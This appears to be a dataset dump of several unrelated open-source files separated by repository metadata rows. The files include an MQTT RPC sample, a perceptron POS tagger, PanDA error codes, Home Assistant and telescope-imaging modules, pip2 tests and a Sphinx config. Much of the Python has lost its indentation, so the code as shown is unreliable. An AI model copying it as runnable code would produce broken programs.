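# and publishes its reply to the same topic with a trailing "/reply".  With the
# 'Driver' id used below, calling test.echo means publishing a JSON-RPC 2.0
# request to /rpc/v1/Driver/test/echo/<client_id> and listening on
# /rpc/v1/Driver/test/echo/<client_id>/reply.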
if __name__ =='__main__':
parser = argparse.ArgumentParser(description='Sample RPC server', add_help=False)
parser.add_argument('-h', '--host', dest='host', type=str,
help='MQTT host', default='localhost')
parser.add_argument('-u', '--username', dest='username', type=str,
help='MQTT username', default='')
parser.add_argument('-P', '--password', dest='password', type=str,
help='MQTT password', default='')
parser.add_argument('-p', '--port', dest='port', type=int,
help='MQTT port', default='1883')
args = parser.parse_args()
client = mosquitto.Mosquitto()
if args.username:
client.username_pw_set(args.username, args.password)
rpc_server = TMQTTRPCServer(client, 'Driver')
client.connect(args.host, args.port)
client.on_message = rpc_server.on_mqtt_message
rpc_server.setup()
while 1:
rc = client.loop()
if rc != 0:
break
| mit | -7,693,251,067,194,599,000 | 24.691489 | 125 | 0.612422 | false |
muyeby/NLP | Tagger/PerceptronTagger/PerceptronClassifier.py | 1 | 11234 | #!/usr/bin/env python
# encoding: utf-8
"""
@version: V1.2
@author: muyeby
@contact: [email protected]
@site: http://muyeby.github.io
@software: PyCharm
@file: assignment2.py
@time: 16-7-7 下午8:44
"""
from __future__ import print_function
from copy import copy
import time
class PerceptronClassifier(object):
# The perceptron classifier
def __init__(self, max_iter=10, training_data=None, devel_data=None):
'''
Parameters
----------
max_iter: int
The max number of iteration
training_data: list
The training data
devel_data: list
The development data, to determine the best iteration.
'''
self.max_iter = max_iter
self.learnRate = 1
if training_data is not None:
self.fit(training_data, devel_data)
def fit(self, training_data, devel_data=None):
'''
Estimate the parameters for perceptron model. For multi-class perceptron, parameters can be
treated as a T \times D matrix W, where T is the number of labels and D is the number of
features.
'''
# feature_alphabet is a mapping from feature string to it's dimension in the feature space,
# e.g. feature_alphabet['U1=I']=3, which means 'U1=I' is in the third column of W
#
# W = [[ . . 1 . . .],
# ...
# [ . . 1 . . .]]
# ^
# |
# 'U1=I'
self.feature_alphabet = {'None': 0}
self.label_alphabet = {}
# Extract features, build the feature_alphabet, label_alphabet and training instance pairs.
# Each instance consist a tuple (X, Y) where X is the mapped features (list(int)), and Y is
# the index of the corresponding label.
instances = []
for words, tags in training_data:
L = len(words)
prev = '<s>'
for i in range(L):
                # Your code here, extract features and put them into X; convert the POS tag to an
                # index and give it to Y
X = self.extract_features(words, i, prev)
Y = len(self.label_alphabet) if tags[i] not in self.label_alphabet.keys() else self.label_alphabet[tags[i]]
instances.append((X, Y))
if tags[i] not in self.label_alphabet.keys():
self.label_alphabet[tags[i]] = len(self.label_alphabet)
prev = tags[i]
# Build a mapping from index to label string to recover POStags.
self.labels = [-1 for k in self.label_alphabet]
for k in self.label_alphabet:
self.labels[self.label_alphabet[k]] = k
self.D, self.T = len(self.feature_alphabet), len(self.label_alphabet)
print('number of features : %d' % self.D)
print('number of labels: %d' % self.T)
# Allocate the weight matrix W
self.W = [[0 for j in range(self.D)] for i in range(self.T)]
self.best_W = copy(self.W)
best_acc = 0
for it in range(self.max_iter):
# The training part,
n_errors = 0
print('training iteration #%d' % it)
for X, Y in instances:
                # Your code here, make a prediction and give it to Z
Z = self._predict(X)
if Z != Y:
                    # print 'initial prediction:', Z, self._score(X, Z), 'score of Y:', self._score(X, Y)
# print self.W[Y]
tmp = self._score(X,Y)
# Your code here. If the predict is incorrect, perform the perceptron update
n_errors += 1
for x in X:
self.W[Y][x] =self.W[Y][x] + 1*self.learnRate
# The perceptron update part.
for i in range(self.T):
if self._score(X, i) >= tmp and i!=Y:
for x in X:
self.W[i][x] = self.W[i][x] - 1 * self.learnRate
                # print 'after update:', self._predict(X), 'correct:', Y, 'score of Y:', self._score(X, Y)
print('training error %d' % n_errors)
if devel_data is not None:
# Test accuracy on the development set if provided.
n_corr, n_total = 0, 0
for words, tags in devel_data:
prev = '<s>'
for i in range(len(words)):
Z = self.predict(words, i, prev)
Y = self.label_alphabet[tags[i]]
if Z == Y:
n_corr += 1
n_total += 1
prev = self.labels[Z]
print('accuracy: %f' % (float(n_corr) / n_total))
# print 'W0',self.W[10][:100]
if best_acc < float(n_corr) / n_total:
# If this round is better than before, save it.
best_acc = float(n_corr) / n_total
self.best_W = copy(self.W)
if self.best_W is None:
self.best_W = copy(self.W)
def extract_features(self, words, i, prev_tag=None, add=True):
'''
Extract features from words and prev POS tag, if `add` is True, also insert the feature
string to the feature_alphabet.
Parameters
----------
words: list(str)
The words list
i: int
The position
prev_tag: str
Previous POS tag
add: bool
If true, insert the feature to feature_alphabet.
Return
------
mapped_features: list(int)
The list of hashed features.
'''
L = len(words)
context = ['<s>' if i - 2 < 0 else words[i - 2],
'<s>' if i - 1 < 0 else words[i - 1],
words[i],
'<e>' if i + 1 >= L else words[i + 1],
                   '<e>' if i + 2 >= L else words[i + 2]]
raw_features = ['U1=%s' % context[0],
'U2=%s' % context[1],
'U3=%s' % context[2],
'U4=%s' % context[3],
'U5=%s' % context[4],
'U1,2=%s/%s' % (context[0], context[1]),
'U2,3=%s/%s' % (context[1], context[2]), # Your code here, extract the bigram raw feature,
'U3,4=%s/%s' % (context[2], context[3]), # Your code here, extract the bigram raw feature,
'U4,5=%s/%s' % (context[3], context[4]), # Your code here, extract the bigram raw feature,
]
if prev_tag is not None:
raw_features.append('B=%s' % prev_tag)
mapped_features = []
for f in raw_features:
if add and (f not in self.feature_alphabet):
# Your code here, insert the feature string to the feature_alphabet.
index = len(self.feature_alphabet)
self.feature_alphabet[f] = index
# Your code here, map the string feature to index.
# for item in self.feature_alphabet.values():
# mapped_features[self.feature_alphabet[item]] = 1
if f in self.feature_alphabet:
mapped_features.append(self.feature_alphabet[f])
return mapped_features
def _score(self, features, t):
'''
Calcuate score from the given features and label t
Parameters
----------
features: list(int)
The hashed features
t: int
The index of label
Return
------
s: int
The score
'''
# Your code here, compute the score.
s=0.0
for x in features:
s += self.W[t][x]
return s
def _predict(self, features):
'''
Calcuate score from the given features and label t
Parameters
----------
features: list(int)
The hashed features
t: int
The index of label
Return
------
best_y: int
The highest scored label's index
'''
pred_scores = [self._score(features, y) for y in range(self.T)]
best_score, best_y = -1e5, -1
# Your code here, find the highest scored class from pred_scores
# best_score = pred_scores[0]
# best_y = 0
for index,value in enumerate(pred_scores):
if value > best_score:
best_score = value
best_y = index
# print 'best:',best_score,best_y
# print max([math.fabs(sc - 10) for sc in pred_scores])
return best_y
def predict(self, words, i, prev_tag=None):
'''
Make prediction on list of words
Parameters
----------
words: list(str)
The words list
i: int
The position
prev_tag: str
Previous POS tag
Return
------
y: int
The predicted label's index
'''
X = self.extract_features(words, i, prev_tag, False)
y = self._predict(X)
return y
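# Toy illustration of the scoring and update rule implemented in fit() above
# (assumed values, not part of the assignment): with T=2 labels and D=3
# features, the hashed features X select columns of W, and a mistake adds +1 to
# those columns for the gold label and -1 for any label scoring at least as
# high.
def _toy_perceptron_update():
    W = [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]
    X, Y = [0, 2], 1                      # gold label index
    scores = [sum(W[t][x] for x in X) for t in range(2)]
    if scores.index(max(scores)) != Y:
        for x in X:
            W[Y][x] += 1.0                # promote the gold label
            W[0][x] -= 1.0                # demote the wrongly preferred label 0
    return W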
def greedy_search(words, classifier):
'''
Perform greedy search on the classifier.
Parameters
----------
words: list(str)
The word list
classifier: PerceptronClassifier
The classifier object.
'''
prev = '<s>'
ret = []
for i in range(len(words)):
# Your code here, implement the greedy search,
label = classifier.predict(words,i,prev)
ret.append(classifier.labels[label])
prev = classifier.labels[label]
return ret
from dataset import read_dataset
print (time.strftime('%Y-%m-%d %H:%M:%S'))
train_dataset = read_dataset('./penn.train.pos.gz')
devel_dataset = read_dataset('./penn.devel.pos.gz')
print('%d training sentences.' % len(train_dataset))
print('%d development sentences.' % len(devel_dataset))
perceptron = PerceptronClassifier(max_iter=1, training_data=train_dataset, devel_data=devel_dataset)
print('========================TEST CASE1==========================')
n_corr, n_total = 0, 0
for devel_data in devel_dataset:
devel_data_x, devel_data_y = devel_data
pred_y = greedy_search(devel_data_x, perceptron)
for pred_tag, corr_tag in zip(pred_y, devel_data_y):
if pred_tag == corr_tag:
n_corr += 1
n_total += 1
print("accuracy: %f" % (float(n_corr)/ n_total))
print('========================TEST CASE2==========================')
print (greedy_search(['HMM', 'is', 'a', 'widely', 'used', 'model', '.'], perceptron))
print (greedy_search(['I', 'like', 'cat', ',', 'but', 'I', 'hate', 'eating', 'fish', '.'], perceptron))
print('========================TEST CASE3==========================')
test_dataset = read_dataset('./penn.test.pos.blind.gz')
fpo=open('./penn.test.perceptron.pos.out', 'w')
for test_data_x, test_data_y in test_dataset:
pred_y = greedy_search(test_data_x, perceptron)
print(" ".join(y for y in pred_y), file=fpo)
fpo.close()
print('Mission complete!')
print (time.strftime('%Y-%m-%d %H:%M:%S')) | mit | 1,610,744,026,520,288,800 | 34.539683 | 123 | 0.506343 | false |
PanDAWMS/panda-server | pandaserver/taskbuffer/ErrorCode.py | 1 | 1738 | ############## error code
# killed
EC_Kill = 100
# transfer timeout
EC_Transfer = 101
# expire
EC_Expire = 102
# aborted
EC_Aborted = 103
# wait timeout
EC_WaitTimeout = 104
# reassigned by rebrokeage
EC_Reassigned = 105
# reassigned by server-side retry
EC_Retried = 106
# retried by pilot
EC_PilotRetried = 107
# lost file (=dataservice.ErrorCode.EC_LostFile)
EC_LostFile = 110
# retried for event service
EC_EventServiceRetried = 111
# merge for event service
EC_EventServiceMerge = 112
# merge job failed
EC_MergeFailed = 113
# max attempt reached for Event Service
EC_EventServiceMaxAttempt = 114
# do nothing since other consumers are still running
EC_EventServiceWaitOthers = 115
# killed since unused and unnecessary any more
EC_EventServiceUnused = 116
# didn't process any events on WN
EC_EventServiceUnprocessed = 117
# didn't process any events on WN and last consumer
EC_EventServiceLastUnprocessed = 118
# all event ranges failed
EC_EventServiceAllFailed = 119
# associated consumer generated ES merge
EC_EventServiceKillOK = 120
# associated consumer failed
EC_EventServiceKillNG = 121
# killed for preemption
EC_EventServicePreemption = 122
# retried but didn't process any events on WN
EC_EventServiceNoEvent = 123
# input files inconsistent with JEDI
EC_EventServiceInconsistentIn = 124
# No event service queues available for new consumers
EC_EventServiceNoEsQueues = 125
# Closed in bad job status
EC_EventServiceBadStatus = 126
# failed to lock semaphore for job cloning
EC_JobCloningUnlock = 200
# worker is done before job is done
EC_WorkerDone = 300
# file not found
class EC_NotFound:
pass
# file relocated
class EC_Redirect:
def __init__(self,url):
self.url = url
| apache-2.0 | 3,461,998,897,724,639,700 | 17.688172 | 53 | 0.758343 | false |
coteyr/home-assistant | homeassistant/components/rollershutter/demo.py | 1 | 2390 | """
Demo platform for the roller shutter component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
from homeassistant.components.rollershutter import RollershutterDevice
from homeassistant.const import EVENT_TIME_CHANGED
from homeassistant.helpers.event import track_utc_time_change
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Demo roller shutters."""
add_devices([
DemoRollershutter(hass, 'Kitchen Window', 0),
DemoRollershutter(hass, 'Living Room Window', 100),
])
class DemoRollershutter(RollershutterDevice):
"""Represents a roller shutter."""
# pylint: disable=no-self-use
def __init__(self, hass, name, position):
self.hass = hass
self._name = name
self._position = position
self._moving_up = True
self._listener = None
@property
def name(self):
"""Returns the name of the roller shutter."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo roller shutter."""
return False
@property
def current_position(self):
"""Return the current position of the roller shutter."""
return self._position
def move_up(self, **kwargs):
"""Move the roller shutter down."""
if self._position == 0:
return
self._listen()
self._moving_up = True
def move_down(self, **kwargs):
"""Move the roller shutter up."""
if self._position == 100:
return
self._listen()
self._moving_up = False
def stop(self, **kwargs):
"""Stops the roller shutter."""
if self._listener is not None:
self.hass.bus.remove_listener(EVENT_TIME_CHANGED, self._listener)
self._listener = None
def _listen(self):
"""Listen for changes."""
if self._listener is None:
self._listener = track_utc_time_change(self.hass,
self._time_changed)
def _time_changed(self, now):
"""Track time changes."""
if self._moving_up:
self._position -= 10
else:
self._position += 10
if self._position % 100 == 0:
self.stop()
self.update_ha_state()
| mit | -3,810,794,242,415,817,000 | 27.795181 | 77 | 0.593305 | false |
osupython/pip2 | tests/test_search.py | 1 | 8658 | import inspect
import sys
from io import StringIO
import pip2.commands.freeze
import pip2.commands.search
import tests.log
from pip2.compat import mock
from pip2.compat import packaging
@mock.patch.object(pip2.commands.freeze, 'freeze')
@mock.patch.object(packaging.pypi.xmlrpc.Client, 'search_projects')
class TestSearchAPI():
def setup(self):
test_proj1 = mock.Mock()
test_proj1.name = 'test_proj1'
test_proj1.releases = mock.MagicMock()
test_proj1.releases[0].version = '1.5'
test_proj1.releases[0].metadata = {}
test_proj1.releases[0].metadata['summary'] = 'Summary for project 1'
test_proj2 = mock.Mock()
test_proj2.name = 'test_proj2'
test_proj2.releases = mock.MagicMock()
test_proj2.releases[0].version = '2.5'
test_proj2.releases[0].metadata = {}
test_proj2.releases[0].metadata['summary'] = 'Summary for project 2'
test_proj3 = mock.Mock()
test_proj3.name = 'test_proj3'
test_proj3.releases = mock.MagicMock()
test_proj3.releases[0].version = '3.5'
test_proj3.releases[0].metadata = {}
test_proj3.releases[0].metadata['summary'] = 'Summary for project 3'
return [test_proj1, test_proj2, test_proj3]
def test_basic_search(self, mock_search_projects, mock_freeze):
mock_search_projects.return_value = self.setup()
mock_freeze.return_value = {}
expected = {'test_proj1': {'summary': 'Summary for project 1'},
'test_proj2': {'summary': 'Summary for project 2'},
'test_proj3': {'summary': 'Summary for project 3'}}
result = pip2.commands.search.search('test')
self.tear_down(result, expected)
def test_basic_search_matches(self, mock_search_projects, mock_freeze):
mock_search_projects.return_value = self.setup()
mock_freeze.return_value = {'test_proj1': {'version': '1.0'},
'test_proj3': {'version': '3.0'}}
expected = {'test_proj1': {'summary': 'Summary for project 1',
'installed_version': '1.0',
'latest_version': '1.5'},
'test_proj2': {'summary': 'Summary for project 2'},
'test_proj3': {'summary': 'Summary for project 3',
'installed_version': '3.0',
'latest_version': '3.5'}}
result = pip2.commands.search.search('test')
self.tear_down(result, expected)
def tear_down(self, result, expected):
try:
assert result == expected
except AssertionError:
print('result : {0}'.format(result))
print('expected: {0}'.format(expected))
raise
@mock.patch.object(pip2.util, 'getTerminalSize')
@mock.patch.object(pip2.commands.search, 'search')
class TestSearchCLI():
min_term_width = 40
default_term_width = 80
term_width = default_term_width
name_len = 26
sep = ' - '
sep_len = len(sep)
sum_len = term_width - name_len - sep_len - 1
args = mock.Mock()
args.project = 'pkgPlaceholder'
def setup(self):
result = tests.log.setup_logger()
return result
def test_basic_display_no_results(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'nonexistantproject'
mock_getTerminalSize.return_value = (self.term_width, None)
mock_search.return_value = {}
expected = 'Search returned no results...\n'
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_name_short(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'shortproject'
mock_getTerminalSize.return_value = (self.term_width, None)
mock_search.return_value = {self.args.project: {'summary': 'sum'}}
expected = self.args.project
expected += ' ' * (self.name_len - len(expected)) + self.sep + 'sum\n'
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_name_long(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'thisIsAVeryLongprojectThatCantDisplayFully'
mock_getTerminalSize.return_value = (self.term_width, None)
mock_search.return_value = {self.args.project: {'summary': 'sum'}}
expected = self.args.project + self.sep + 'sum'
expected = expected[: (self.sum_len + self.name_len +
self.sep_len)] + '\n'
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_sum_single_line(self, mock_search,
mock_getTerminalSize):
result = self.setup()
self.args.project = 'pkgPlaceholder'
mock_getTerminalSize.return_value = (self.term_width, None)
desc = 'X' * (self.sum_len)
mock_search.return_value = {self.args.project: {'summary': desc}}
expected = (self.args.project + ' ' * (self.name_len -
len(self.args.project)) + self.sep + desc + '\n')
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_sum_word_wrap(self, mock_search,
mock_getTerminalSize):
result = self.setup()
self.args.project = 'pkgPlaceholder'
mock_getTerminalSize.return_value = (self.term_width, None)
desc = 'X' * int(self.sum_len * 1.5)
mock_search.return_value = {self.args.project: {'summary': desc}}
desc_ln1 = desc[: self.sum_len]
desc_ln2 = desc[len(desc_ln1):]
expected = (self.args.project + ' ' * (self.name_len -
len(self.args.project)) + self.sep + desc_ln1 + '\n' +
' ' * (self.name_len + self.sep_len) + desc_ln2 + '\n')
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
def test_basic_display_matches(self, mock_search, mock_getTerminalSize):
result = self.setup()
self.args.project = 'pkgPlaceholder'
mock_getTerminalSize.return_value = (self.term_width, None)
installed = '1.0'
latest = '1.5'
desc = 'X' * self.sum_len
mock_search.return_value = {self.args.project: {'summary': desc,
'installed_version': installed,
'latest_version': latest}}
expected = (self.args.project + ' ' * (self.name_len -
len(self.args.project)) + self.sep + desc +
'\n\tINSTALLED: ' + installed + '\n\tLATEST : ' +
latest + '\n')
pip2.cli_wrapper.search(self.args)
self.tear_down(result.getvalue(), expected)
# System level test. Runs all previous tests at different terminal sizes.
def test_system_display_terminal_scale(self, mock_search,
mock_getTerminalSize):
# test case:
# 35 - too small must be min of 40
# 60 - small term
# 180 - large term
term_widths = [35, 60, 180]
for term_width in term_widths:
self.term_width = term_width
if self.term_width >= self.min_term_width:
width_used = self.term_width
else:
width_used = self.min_term_width
self.sum_len = width_used - self.name_len - self.sep_len - 1
self._run_all_project_tests()
self.term_width = self.default_term_width
def _run_all_project_tests(self):
self.test_basic_display_no_results()
self.test_basic_display_name_short()
self.test_basic_display_name_long()
self.test_basic_display_sum_single_line()
self.test_basic_display_sum_word_wrap()
self.test_basic_display_matches()
def tear_down(self, result, expected):
try:
assert result == expected
except AssertionError:
result = result.replace('\n', '\\n')
expected = expected.replace('\n', '\\n')
output = ('\nUnit test : {0}'.format(inspect.stack()[1][3]) +
'\nTerm width: {0}'.format(self.term_width) +
'\nResult : \n{0}\n'.format(result) +
'\nExpected : \n{0}'.format(expected))
print(output)
raise
| mit | 8,237,081,458,629,602,000 | 41.234146 | 79 | 0.57161 | false |
System25/gecosws-config-assistant | firstboot/serverconf/ChefConf.py | 1 | 3448 | # -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <[email protected]>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <[email protected]>"
__license__ = "GPL-2"
import firstboot.validation as validation
class ChefConf():
def __init__(self):
self._data = {}
self._data['chef_server_uri'] = ''
self._data['chef_validation'] = ''
self._data['chef_link'] = False
self._data['chef_link_existing'] = False
def load_data(self, conf):
msg = 'ServerConf: Key "%s" not found in the configuration file.'
try:
self.set_url(conf['chef_server_uri'])
except KeyError as e:
print msg % ('chef_server_uri',)
try:
self.set_pem(conf['chef_validation'])
except KeyError as e:
print msg % ('chef_validation',)
try:
self.set_chef_link(conf['chef_link'])
except KeyError as e:
print msg % ('chef_link',)
def validate(self):
        valid = (validation.is_url(self._data['chef_server_uri']) and
                 self._data['chef_validation'] != '' and
                 self._data['chef_link'] is not None and
                 self._data['chef_link_existing'] is not None)
return valid
def get_url(self):
return self._data['chef_server_uri'].encode('utf-8')
def set_url(self, url):
self._data['chef_server_uri'] = url
return self
def get_pem(self):
return self._data['chef_validation'].encode('utf-8')
def set_pem(self, pem):
self._data['chef_validation'] = pem
return self
    # --- Next fields are not present in the JSON file but are
    #     set at runtime by Firstboot ---
def set_chef_link_existing(self, link_existing):
self._data['chef_link_existing'] = link_existing
return self
def get_chef_link_existing(self):
return self._data['chef_link_existing']
def set_chef_link(self, chef_link):
self._data['chef_link'] = chef_link
return self
def get_chef_link(self):
return self._data['chef_link']
def get_node_name(self):
if not 'node_name' in self._data:
self._data['node_name'] = ''
return self._data['node_name'].encode('utf-8')
def set_node_name(self, node_name):
self._data['node_name'] = node_name
return self
def get_admin_name(self):
if not 'chef_admin_name' in self._data:
self._data['chef_admin_name'] = ''
return self._data['chef_admin_name'].encode('utf-8')
def set_admin_name(self, admin_name):
self._data['chef_admin_name'] = admin_name
return self
| gpl-2.0 | -7,859,253,604,361,442,000 | 32.784314 | 185 | 0.619269 | false |
tovmeod/anaf | minidetector/__init__.py | 1 | 2048 | from useragents import search_strings
class Middleware(object):
@staticmethod
def process_request(request):
"""Adds a "mobile" attribute to the request which is True or False
depending on whether the request should be considered to come from a
small-screen device such as a phone or a PDA"""
if "HTTP_X_OPERAMINI_FEATURES" in request.META:
# Then it's running opera mini. 'Nuff said.
# Reference from:
# http://dev.opera.com/articles/view/opera-mini-request-headers/
request.mobile = True
return None
if "HTTP_ACCEPT" in request.META:
s = request.META["HTTP_ACCEPT"].lower()
if 'application/vnd.wap.xhtml+xml' in s:
# Then it's a wap browser
request.mobile = True
return None
if "HTTP_USER_AGENT" in request.META:
# This takes the most processing. Surprisingly enough, when I
# Experimented on my own machine, this was the most efficient
# algorithm. Certainly more so than regexes.
# Also, Caching didn't help much, with real-world caches.
s = request.META["HTTP_USER_AGENT"].lower()
for ua in search_strings:
if ua in s:
request.mobile = True
return None
# Otherwise it's not a mobile
request.mobile = False
return None
def detect_mobile(view):
"""View Decorator that adds a "mobile" attribute to the request which is
True or False depending on whether the request should be considered
to come from a small-screen device such as a phone or a PDA"""
def detected(request, *args, **kwargs):
Middleware.process_request(request)
return view(request, *args, **kwargs)
detected.__doc__ = "{0!s}\n[Wrapped by detect_mobile which detects if the request is from a phone]".format(view.__doc__)
return detected
__all__ = ['Middleware', 'detect_mobile']
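# Illustrative sketch (not part of the original module): exercising the
# middleware with a minimal stand-in request object. The user-agent string
# below is only an example; any string matching an entry in search_strings
# would be detected the same way.
if __name__ == '__main__':
    class _FakeRequest(object):
        META = {'HTTP_USER_AGENT': 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X)'}
    _request = _FakeRequest()
    Middleware.process_request(_request)
    print(_request.mobile)  # True when the user agent matches a known mobile string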
| bsd-3-clause | 6,936,481,703,161,349,000 | 36.925926 | 124 | 0.606445 | false |
AstroHuntsman/POCS | pocs/images.py | 1 | 7615 | import os
from astropy import units as u
from astropy import wcs
from astropy.coordinates import EarthLocation
from astropy.coordinates import FK5
from astropy.coordinates import SkyCoord
from astropy.io import fits
from astropy.time import Time
from collections import namedtuple
from . import PanBase
from .utils import images as img_utils
OffsetError = namedtuple('OffsetError', ['delta_ra', 'delta_dec', 'magnitude'])
class Image(PanBase):
def __init__(self, fits_file, wcs_file=None, location=None):
"""Object to represent a single image from a PANOPTES camera.
Args:
fits_file (str): Name of FITS file to be read (can be .fz)
wcs_file (str, optional): Name of FITS file to use for WCS
"""
super().__init__()
assert os.path.exists(fits_file), self.logger.warning(
'File does not exist: {}'.format(fits_file))
if fits_file.endswith('.fz'):
fits_file = img_utils.fpack(fits_file, unpack=True)
assert fits_file.lower().endswith(('.fits')), \
self.logger.warning('File must end with .fits')
self.wcs = None
self._wcs_file = None
self.fits_file = fits_file
if wcs_file is not None:
self.wcs_file = wcs_file
else:
self.wcs_file = fits_file
with fits.open(self.fits_file, 'readonly') as hdu:
self.header = hdu[0].header
assert 'DATE-OBS' in self.header, self.logger.warning(
'FITS file must contain the DATE-OBS keyword')
assert 'EXPTIME' in self.header, self.logger.warning(
'FITS file must contain the EXPTIME keyword')
# Location Information
if location is None:
cfg_loc = self.config['location']
location = EarthLocation(lat=cfg_loc['latitude'],
lon=cfg_loc['longitude'],
height=cfg_loc['elevation'],
)
# Time Information
self.starttime = Time(self.header['DATE-OBS'], location=location)
self.exptime = float(self.header['EXPTIME']) * u.second
self.midtime = self.starttime + (self.exptime / 2.0)
self.sidereal = self.midtime.sidereal_time('apparent')
self.FK5_Jnow = FK5(equinox=self.midtime)
# Coordinates from header keywords
self.header_pointing = None
self.header_ra = None
self.header_dec = None
self.header_ha = None
# Coordinates from WCS
self.pointing = None
self.ra = None
self.dec = None
self.ha = None
self.get_header_pointing()
self.get_wcs_pointing()
self._luminance = None
self._pointing = None
self._pointing_error = None
@property
def wcs_file(self):
"""WCS file name
When setting the WCS file name, the WCS information will be read,
setting the `wcs` property.
"""
return self._wcs_file
@wcs_file.setter
def wcs_file(self, filename):
if filename is not None:
try:
w = wcs.WCS(filename)
assert w.is_celestial
self.wcs = w
self._wcs_file = filename
except Exception:
self.logger.debug("Can't get WCS from FITS file (try solve_field)")
@property
def pointing_error(self):
"""Pointing error namedtuple (delta_ra, delta_dec, magnitude)
Returns pointing error information. The first time this is accessed
this will solve the field if not previously solved.
Returns:
namedtuple: Pointing error information
"""
if self._pointing_error is None:
assert self.pointing is not None, self.logger.warning(
"No world coordinate system (WCS), can't get pointing_error")
assert self.header_pointing is not None
if self.wcs is None:
self.solve_field()
mag = self.pointing.separation(self.header_pointing)
d_dec = self.pointing.dec - self.header_pointing.dec
d_ra = self.pointing.ra - self.header_pointing.ra
            self._pointing_error = OffsetError(
                d_ra.to(u.arcsec), d_dec.to(u.arcsec), mag.to(u.arcsec))
return self._pointing_error
def get_header_pointing(self):
"""Get the pointing information from the header
The header should contain the `RA-MNT` and `DEC-MNT` keywords, from which
the header pointing coordinates are built.
"""
try:
self.header_pointing = SkyCoord(ra=float(self.header['RA-MNT']) * u.degree,
dec=float(self.header['DEC-MNT']) * u.degree)
self.header_ra = self.header_pointing.ra.to(u.hourangle)
self.header_dec = self.header_pointing.dec.to(u.degree)
# Precess to the current equinox otherwise the RA - LST method will be off.
self.header_ha = self.header_pointing.transform_to(
self.FK5_Jnow).ra.to(u.hourangle) - self.sidereal
except Exception as e:
self.logger.warning('Cannot get header pointing information: {}'.format(e))
def get_wcs_pointing(self):
"""Get the pointing information from the WCS
Builds the pointing coordinates from the plate-solved WCS. These will be
compared with the coordinates stored in the header.
"""
if self.wcs is not None:
ra = self.wcs.celestial.wcs.crval[0]
dec = self.wcs.celestial.wcs.crval[1]
self.pointing = SkyCoord(ra=ra * u.degree, dec=dec * u.degree)
self.ra = self.pointing.ra.to(u.hourangle)
self.dec = self.pointing.dec.to(u.degree)
# Precess to the current equinox otherwise the RA - LST method will be off.
self.ha = self.pointing.transform_to(self.FK5_Jnow).ra.to(u.hourangle) - self.sidereal
def solve_field(self, **kwargs):
""" Solve field and populate WCS information
Args:
**kwargs (dict): Options to be passed to `get_solve_field`
"""
solve_info = img_utils.get_solve_field(self.fits_file,
ra=self.header_pointing.ra.value,
dec=self.header_pointing.dec.value,
**kwargs)
self.wcs_file = solve_info['solved_fits_file']
self.get_wcs_pointing()
# Remove some fields
for header in ['COMMENT', 'HISTORY']:
try:
del solve_info[header]
except KeyError:
pass
return solve_info
def compute_offset(self, ref_image):
assert isinstance(ref_image, Image), self.logger.warning(
"Must pass an Image class for reference")
mag = self.pointing.separation(ref_image.pointing)
d_dec = self.pointing.dec - ref_image.pointing.dec
d_ra = self.pointing.ra - ref_image.pointing.ra
return OffsetError(d_ra.to(u.arcsec), d_dec.to(u.arcsec), mag.to(u.arcsec))
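    # Illustrative usage sketch (not part of the original class); the FITS
    # file name below is hypothetical:
    #
    #   img = Image('pointing01.fits')
    #   err = img.pointing_error   # plate-solves first if no WCS is present yet
    #   print(err.delta_ra, err.delta_dec, err.magnitude)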
##################################################################################################
# Private Methods
##################################################################################################
def __str__(self):
return "{}: {}".format(self.fits_file, self.header_pointing)
| mit | -6,846,705,688,718,471,000 | 34.584112 | 98 | 0.562049 | false |
pombredanne/django-rest-assured | docs/source/conf.py | 1 | 8599 | # -*- coding: utf-8 -*-
#
# django-rest-assured documentation build configuration file, created by
# sphinx-quickstart on Fri Oct 24 10:48:27 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.pardir, os.path.pardir)))
from django.conf import settings
# mock the AUTH_USER_MODEL setting so that django imports won't break
settings.configure(AUTH_USER_MODEL='account.Accounts')
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-rest-assured'
copyright = u'2014, Yehonatan Daniv'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
